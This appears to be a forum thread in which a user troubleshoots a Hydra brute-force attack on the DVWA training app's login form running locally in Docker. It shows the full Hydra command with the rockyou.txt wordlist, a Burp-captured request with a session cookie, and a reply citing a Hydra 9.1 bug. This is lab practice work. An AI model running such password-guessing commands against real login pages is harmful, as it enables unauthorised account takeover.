Hydra hangs after TASKS number of tries

  • I have dvwa set up and i am using the command:

    hydra -IV -t 1 -l admin -P rockyou.txt localhost http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: PHPSESSID=tegnf0po32eavd385ckd9khqc3; security=low"

    since my request in BurpSuite looks like this:

    GET /vulnerabilities/brute/index.php?username=test&password=123&Login=Login HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/vulnerabilities/brute/index.php
    Cookie: PHPSESSID=tegnf0po32eavd385ckd9khqc3; security=low
    Upgrade-Insecure-Requests: 1

    Hydra only tries one password and then hangs, only giving status updates for the next minutes like so:

    [STATUS] 1.00 tries/min, 1 tries in 00:01h, 14344397 to do in 239073:18h, 1 active
    [STATUS] 0.33 tries/min, 1 tries in 00:03h, 14344397 to do in 717219:52h, 1 active

    My hydra version is v9.1

    I am running DVWA in a docker container and can access the target page via browser on the url: http://localhost/vulnerabilities/brute/index.php

  • According to this issue: https://github.com/vanhauser-thc/thc-hydra/issues/612 Hydra 9.1 has a bug that affects that command... even though version 9.2 only says about an http-post-request buxfix

    Kali does not install 9.2 version and says 9.1 is the latest when doing sudo apt install hydra

Suggested Topics

  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2